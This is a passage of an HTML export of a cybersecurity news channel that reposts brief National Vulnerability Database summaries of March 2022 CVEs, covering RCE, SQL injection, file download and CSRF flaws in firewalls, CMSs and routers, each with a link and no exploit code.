      <div class="body">

       <div class="pull_right date details" title="18.03.2022 21:23:19">
21:23
       </div>

       <div class="text">
<strong>‼ CVE-2022-25390 ‼</strong><br><br><code>DCN Firewall DCME-520 was discovered to contain a remote command execution (RCE) vulnerability via the host parameter in the file /system/tool/ping.php.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-25390">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39287">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 21:23:20">
21:23
       </div>

       <div class="text">
<strong>‼ CVE-2022-25578 ‼</strong><br><br><code>taocms v3.0.2 allows attackers to execute code injection via arbitrarily editing the .htaccess file.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-25578">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39288">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 21:23:21">
21:23
       </div>

       <div class="text">
<strong>‼ CVE-2022-25389 ‼</strong><br><br><code>DCN Firewall DCME-520 was discovered to contain an arbitrary file download vulnerability via the path parameter in the file /audit/log/log_management.php.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-25389">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39289">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 21:23:23">
21:23
       </div>

       <div class="text">
<strong>‼ CVE-2022-26266 ‼</strong><br><br><code>Piwigo v12.2.0 was discovered to contain a SQL injection vulnerability via pwg.users.php.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26266">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message service" id="message-1082">

      <div class="body details">
19 March 2022
      </div>

     </div>

     <div class="message default clearfix" id="message39290">

      <div class="pull_left userpic_wrap">

       <div class="userpic userpic4" style="width: 42px; height: 42px">

        <div class="initials" style="line-height: 42px">
?
        </div>

       </div>

      </div>

      <div class="body">

       <div class="pull_right date details" title="19.03.2022 02:23:12">
02:23
       </div>

       <div class="from_name">
🛡 Cybersecurity &amp; Privacy news 🛡 
       </div>

       <div class="text">
<strong>‼ CVE-2022-27226 ‼</strong><br><br><code>A CSRF issue in /api/crontab on iRZ Mobile Routers through 2022-03-16 allows a threat actor to create a crontab entry in the router administration panel. The cronjob will consequently execute the entry on the threat actor&apos;s defined interval, leading to remote code execution, allowing the threat actor to gain filesystem access. In addition, if the router&apos;s default credentials aren&apos;t rotated or a threat actor discovers valid credentials, remote code execution can be achieved without user interaction.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-27226">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix" id="message39291">

      <div class="pull_left userpic_wrap">

       <div class="userpic userpic4" style="width: 42px; height: 42px">

        <div class="initials" style="line-height: 42px">
?
        </div>

       </div>

      </div>

      <div class="body">

       <div class="pull_right date details" title="19.03.2022 07:23:03">
07:23
       </div>

       <div class="from_name">
🛡 Cybersecurity &amp; Privacy news 🛡 
       </div>

       <div class="text">
<strong>‼ CVE-2022-0991 ‼</strong><br><br><code>Insufficient Session Expiration in GitHub repository admidio/admidio prior to 4.1.9.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-0991">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

    </div>

   </div>

  </div>

 </body>

</html>